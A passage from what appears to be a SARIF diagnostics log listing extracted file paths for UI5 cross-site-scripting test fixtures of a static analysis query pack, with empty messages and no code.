- "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 350 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 351 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 352 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 353 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 354 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 357 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 358 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 359 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", - "uriBaseId" : "%SRCROOT%", - "index" : 360 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 361 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 362 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 363 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 364 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 365 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 366 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 368 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 369 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 370 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 371 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 372 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 373 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 374 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 376 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 377 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 378 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 379 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 380 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 381 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 383 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 384 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 385 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 386 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 387 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 388 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 389 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 390 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 391 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 392 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 393 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 394 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 395 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 396 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 397 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 399 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 400 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 401 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 402 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - 
"artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 403 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 404 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 405 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 406 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 407 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 408 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 409 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
